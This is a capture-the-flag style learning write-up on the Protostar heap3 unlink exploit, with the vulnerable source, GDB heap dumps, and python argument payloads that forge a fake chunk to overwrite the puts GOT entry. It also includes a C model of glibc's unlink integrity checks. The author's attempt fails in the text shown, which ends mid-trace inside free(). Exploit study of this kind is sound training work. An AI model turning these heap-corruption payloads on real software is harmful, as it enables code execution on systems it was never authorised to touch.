0x12 – Unlink

Once upon a free() (Phrack magazine)

Once we get to unlink, things get harder than before, so you'll need to read this as well:

https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

We'll study it with Protostar's heap3.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <time.h>   /* time() is used below; the listing as printed lacked this include */

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  /* unbounded copies: an argument longer than the 32-byte allocation
     runs into the header of the following chunk */
  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

Here we have to reach the winner function. The difference from the UAF level is that nothing is used again after it is freed, so the approach that worked for UAF won't help here.

Let's run it.

$ ./heap3 aaa bbb ccc
dynamite failed?

Let's debug it with GDB.

Run up to the point where the input has been strcpy'd onto the malloc'd chunks.

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804890a <main+129>:   mov    eax,DWORD PTR [esp+0x1c]
0x804890e <main+133>:   mov    DWORD PTR [esp],eax
0x8048911 <main+136>:   call   0x8049824 <free>
24      in heap3/heap3.c

Let's look at it as a diagram.

If we keep running, it will free the chunks. OK, let's run.

0x804c000:      0x00000000      0x00000029      0x0804c028      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x0804c050      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804892e <main+165>:   mov    DWORD PTR [esp],0x804ac27
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave
28      in heap3/heap3.c

Let's look at it as a diagram.

We can see the FD pointers. So let's give about 10 characters of input and let it run until the frees are done.

(gdb) run AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC
0x804c000:      0x00000000      0x00000029      0x0804c028      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x0804c050      0x42424242      0x00004242      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x00000000      0x43434343
0x804c060:      0x00004343      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave

Breakpoint 2, 0x08048935 in main (argc=4, argv=0xbffffd44) at heap3/heap3.c:28
28      in heap3/heap3.c

I don't know who first thought of this. Even with others demonstrating it, I had to look hard to see it. It's very interesting. We know the program takes user input and then frees the heap chunks. Where does it start? Since the first call is free(c), it starts with the last chunk. That is also what the unlink exploit mainly works on: after the last chunk we have to add one more, a fake chunk.

So when freeing, it looks at the next chunk; if the next chunk is not in use, it unlinks it.

Image captured from here

As for unlink: if the chunk size and the prev_size in the next chunk are the same, the error "corrupted size vs prev_size" is raised. The next one is also an error. So that leaves the last one.

Trying it hands-on will make it clearer.

First, overflow so that the third chunk's size becomes 100.

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` CCCCCCCCCC

Heap result

0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x00004343      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000

The chunk size has been changed from 0x29 to 0x65.

OK, now fill the chunk data with nothing but C's.

0x804c054+0x65 = 0x804c0b9

Overwrite until we reach that address.

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96'`

Heap result

0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x43434343      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000

Right. Now, to get to the unlink, we have to build a fake chunk. The fake chunk cannot contain null bytes.

Vudo malloc tricks, from Phrack

0xfffffffc = -4

We put in a negative value. By giving the chunk size a negative value, it looks back at the previous chunk in front of it. -4 is put in there again as well.

How does the algorithm check whether a chunk is in use? It looks at the last bit: 0 means not in use, 1 means in use.

1100 therefore means not in use. So it unlinks.

P->bk->fd

unlink takes the forward pointer and backward pointer from the next two words of the next chunk.

This is where we have to overwrite the GOT. As the forward pointer we put the heap; as the backward pointer we overwrite the GOT.
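The unlink step described above, modelled in C as an added example (this is not Protostar's or glibc's code). It shows the two consistency checks that current glibc runs before it performs the fd->bk and bk->fd writes: the chunk's size must agree with the prev_size that the following chunk records (the "corrupted size vs. prev_size" error mentioned earlier), and both neighbours must point back at the chunk being unlinked ("corrupted double-linked list"). The older allocator compiled into the Protostar binary performs neither check, which is why a forged fd/bk pair survives free() there. The arena, bin head, chunk sizes and the three scenarios are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a dlmalloc/glibc chunk header; not the library's code. */
typedef struct chunk {
    size_t prev_size;      /* size of the previous chunk, valid only while that chunk is free */
    size_t size;           /* this chunk's size, PREV_INUSE in the lowest bit */
    struct chunk *fd;      /* forward pointer in the free list, meaningful only when free */
    struct chunk *bk;      /* backward pointer in the free list, meaningful only when free */
} chunk;

#define PREV_INUSE    ((size_t)1)
#define SIZE_BITS     ((size_t)3)                /* PREV_INUSE | IS_MMAPPED */
#define chunksize(p)  ((p)->size & ~SIZE_BITS)
#define next_chunk(p) ((chunk *)((char *)(p) + chunksize(p)))

enum unlink_result { UNLINK_OK = 0, BAD_PREV_SIZE = 1, BAD_LINKS = 2 };

/* Remove p from its doubly linked free list, refusing if the header or the
 * links are inconsistent.  Without the two checks, fd->bk = bk and
 * bk->fd = fd are writes through whatever values happen to sit in the chunk. */
enum unlink_result unlink_checked(chunk *p)
{
    if (chunksize(p) != next_chunk(p)->prev_size)
        return BAD_PREV_SIZE;          /* glibc reports "corrupted size vs. prev_size" */
    chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return BAD_LINKS;              /* glibc reports "corrupted double-linked list" */
    fd->bk = bk;                       /* the "fd->bk = BK" write the text refers to */
    bk->fd = fd;
    return UNLINK_OK;
}

/* A constructed arena: free chunk p (48 bytes) followed by an in-use chunk
 * whose prev_size records p's size, with p as the only member of a bin. */
static chunk arena[4];                 /* 128 bytes of 8-byte-aligned storage */
static chunk bin_head;

static chunk *setup_free_chunk(void)
{
    memset(arena, 0, sizeof arena);
    chunk *p = arena;
    p->size = 48 | PREV_INUSE;         /* p's own predecessor is in use */
    chunk *next = next_chunk(p);       /* (char *)arena + 48 */
    next->prev_size = 48;              /* consistent with chunksize(p) */
    next->size = 32;                   /* PREV_INUSE clear: p is free */
    bin_head.fd = bin_head.bk = p;
    p->fd = p->bk = &bin_head;
    return p;
}

/* Scenario 1: a well-formed free chunk unlinks and the bin becomes empty. */
int scenario_clean(void)
{
    int r = unlink_checked(setup_free_chunk());
    return r == UNLINK_OK && bin_head.fd == &bin_head && bin_head.bk == &bin_head;
}

/* Scenario 2: an overflow replaced the size field, so it no longer agrees
 * with the prev_size stored in the chunk that follows. */
int scenario_bad_size(void)
{
    chunk *p = setup_free_chunk();
    p->size = 0x60 | PREV_INUSE;       /* next_chunk(p) now lands on zeroed memory */
    return unlink_checked(p);
}

/* Scenario 3: bk was redirected to memory that does not point back at p. */
int scenario_forged_bk(void)
{
    chunk *p = setup_free_chunk();
    static chunk elsewhere;            /* fd/bk are NULL, so elsewhere.fd != p */
    p->bk = &elsewhere;
    return unlink_checked(p);
}

int main(void)
{
    printf("clean unlink ok: %d\n", scenario_clean());
    printf("bad size  -> %d (1 = corrupted size vs. prev_size)\n", scenario_bad_size());
    printf("forged bk -> %d (2 = corrupted double-linked list)\n", scenario_forged_bk());
    return 0;
}
```

The order of the checks matters: the size/prev_size comparison runs before fd and bk are even dereferenced, so a header clobbered by an overflow is rejected without touching the pointers it contains.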

Let's try it.

(gdb) disas 0x8048790
Dump of assembler code for function puts@plt:
0x08048790 <puts@plt+0>:        jmp    DWORD PTR ds:0x804b128
0x08048796 <puts@plt+6>:        push   0x68
0x0804879b <puts@plt+11>:       jmp    0x80486b0
End of assembler dump.
(gdb) x 0x804b128-12
0x804b11c <_GLOBAL_OFFSET_TABLE_+52>:   xchg   WORD PTR [eax+ecx*1],ax

You'll notice I subtracted 12 bytes. Why? Because when unlink does fd->bk = BK, bk sits 12 bytes into the chunk. You already know that: prev_size 4 + size 4 + fd 4 + bk.

For now we have this:

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08"'`

Since we want this to go back onto the heap, the heap address has to be placed in the bk slot.

(gdb) run `python -c 'print "\x68\x64\x88\x04\x08\xC3"'` `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x08\xc0\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 `python -c 'print "\x68\x64\x88\x04\x08\xC3"'` `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x08\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x43434343      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]

Breakpoint 3, 0x08048911 in main (argc=4, argv=0xbffffcd4) at heap3/heap3.c:24
---Type <return> to continue, or q <return> to quit---
24      in heap3/heap3.c


(gdb) ni
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0x804891a <main+145>:   mov    DWORD PTR [esp],eax
25      in heap3/heap3.c

This line changed
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194


(gdb) ni
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891a <main+145>:   mov    DWORD PTR [esp],eax
0x804891d <main+148>:   call   0x8049824 <free>
0x0804891a      25      in heap3/heap3.c

This line also changed

0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc

No no! It doesn't work 🙁

The trouble is that when the method others showed doesn't work, I don't know what to do next. What's certain is that I don't understand this as well as I understood the stack. So I'll have to work on understanding it more.

Revisiting Heap

Break at the start of free

(gdb) break *0x08048911
Breakpoint 2 at 0x8048911: file heap3/heap3.c, line 24.

Run it

(gdb) run AAAA BBBB CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd54) at heap3/heap3.c:24
24      in heap3/heap3.c

OK, now free is about to start. I won't step with ni anymore; I'll go with si and look inside free to understand it as well.

I'll change the hook too, so it also shows the stack and the registers.

(gdb) define hook-stop
Redefine command "hook-stop"? (y or n) y
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/56wx 0x804c000
>x/2i $eip
>x/32wx $esp
>i r eax ebx ecx edx
>end

Start

(gdb) run AAAA BBBB CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
0xbffffcb0:     0x00000004      0xbffffd54      0xbffffd68      0xb7fe1848
0xbffffcc0:     0xbffffd10      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcd0:     0x00000001      0xbffffd10      0xb7ff0626      0xb7fffab0
0xbffffce0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcf0:     0xbffffd28      0x30752f63      0x1a343973      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd54) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c

Call free

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049824 <free>:       push   ebp
0x8049825 <free+1>:     mov    ebp,esp
0xbffffc7c:     0x08048916      0x0804c058      0xbffffe91      0x0804ab50
0xbffffc8c:     0xbffffca8      0xb7ec6365      0x0804c008      0x0804c030
0xbffffc9c:     0x0804c058      0x0804ab50      0x00000000      0xbffffd28
0xbffffcac:     0xb7eadc76      0x00000004      0xbffffd54      0xbffffd68
0xbffffcbc:     0xb7fe1848      0xbffffd10      0xffffffff      0xb7ffeff4
0xbffffccc:     0x08048576      0x00000001      0xbffffd10      0xb7ff0626
0xbffffcdc:     0xb7fffab0      0xb7fe1b28      0xb7fd7ff4      0x00000000
0xbffffcec:     0x00000000      0xbffffd28      0x30752f63      0x1a343973
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
free (mem=0x804c058) at common/malloc.c:3583
3583    common/malloc.c: No such file or directory.
        in common/malloc.c

From the result, the free function is about to set up its stack frame. Run until the frame is built.

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804982a <free+6>:     mov    DWORD PTR [ebp-0x38],0x804b160
0x8049831 <free+13>:    cmp    DWORD PTR [ebp+0x8],0x0
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x00000001      0x0804848c      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3583    in common/malloc.c

Next comes mov DWORD PTR [ebp-0x38],0x804b160

What are those?

(gdb) x $ebp-0x38
0xbffffc40:     0x00000001
(gdb) x 0x804b160
0x804b160 <av_>:        0x00000049

What on earth is av_?

http://www.gnu.org/software/libffcall/avcall.html

Right, it calls a function. OK, let's look at the next line.

0x8049831 <free+13>:    cmp    DWORD PTR [ebp+0x8],0x0
(gdb) x $ebp+0x8
0xbffffc80:     0x0804c058
(gdb) x 0x0804c058
0x804c058:      0x43434343

So it looks over at the C's on the heap and checks whether that is equal to 0 or not. Keep running.

0x8049835 <free+17>:    je     0x8049a89 <free+613>

If they are equal, it jumps to free+613. What's that?

0x08049a89 <free+613>:  leave

It's leave. OK, since they are not equal here, it doesn't go there.

0x804983b <free+23>:    mov    eax,DWORD PTR [ebp+0x8]

Put the heap address into eax

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804983e <free+26>:    sub    eax,0x8
0x8049841 <free+29>:    mov    DWORD PTR [ebp-0x34],eax
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804848c      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804983e      3598    in common/malloc.c

After that, subtract 0x8 from eax

eax            0x804c050        134529104

Then it does

0x8049841 <free+29>:    mov    DWORD PTR [ebp-0x34],eax

Store that eax at ebp-0x34.

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049844 <free+32>:    mov    eax,DWORD PTR [ebp-0x34]
0x8049847 <free+35>:    mov    eax,DWORD PTR [eax+0x4]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c050        134529104
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3599    in common/malloc.c

So it saves eax back onto the stack. Then

0x8049844 <free+32>:    mov    eax,DWORD PTR [ebp-0x34]

OK, does it want to put something else into eax? No, it loads the same value back 😀

(gdb) x $ebp-0x34
0xbffffc44:     0x0804c050

Next line

0x8049847 <free+35>:    mov    eax,DWORD PTR [eax+0x4]

Add 4 to eax. I know, that's the chunk size.

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804984a <free+38>:    and    eax,0xfffffffc
